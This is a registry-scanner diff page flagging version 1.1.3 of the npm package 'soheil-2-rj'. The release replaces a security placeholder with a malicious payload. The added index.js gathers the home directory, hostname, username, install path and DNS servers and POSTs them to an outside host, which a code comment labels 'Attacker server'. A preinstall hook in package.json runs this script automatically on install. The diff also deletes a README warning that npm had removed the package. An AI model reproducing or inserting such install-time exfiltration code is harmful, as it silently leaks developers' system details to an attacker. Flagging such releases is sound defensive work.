soheil-2-rj 0.0.1-security → 1.1.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of soheil-2-rj might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +35 -0
  2. package/package.json +11 -5
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,35 @@
1
+ // requirements
2
+ const dns = require('dns')
3
+ const os = require('os')
4
+ const https = require('https')
5
+ const package = require('./package.json')
6
+
7
+ // User info
8
+ const userData = JSON.stringify({
9
+ p: package,
10
+ a: __dirname,
11
+ b: os.homedir,
12
+ c: os.hostname,
13
+ d: os.userInfo().username,
14
+ d: dns.getServers()
15
+ })
16
+
17
+ // Attacker server
18
+ const options = {
19
+ hostname: 'r.memor.name',
20
+ port: 443,
21
+ path: '/',
22
+ method: 'POST',
23
+ headers: {
24
+ "Content-Type": "application/json",
25
+ "Content-Length": userData.length
26
+ }
27
+ }
28
+
29
+ const req = https.request(options, (res) => {
30
+ res.on('data', (d) => {
31
+ process.stdout.write(d)
32
+ })
33
+ })
34
+ req.write(userData)
35
+ req.end()
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
- "name": "soheil-2-rj",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
2
+ "name": "soheil-2-rj",
3
+ "version": "1.1.3",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=soheil-2-rj for more information.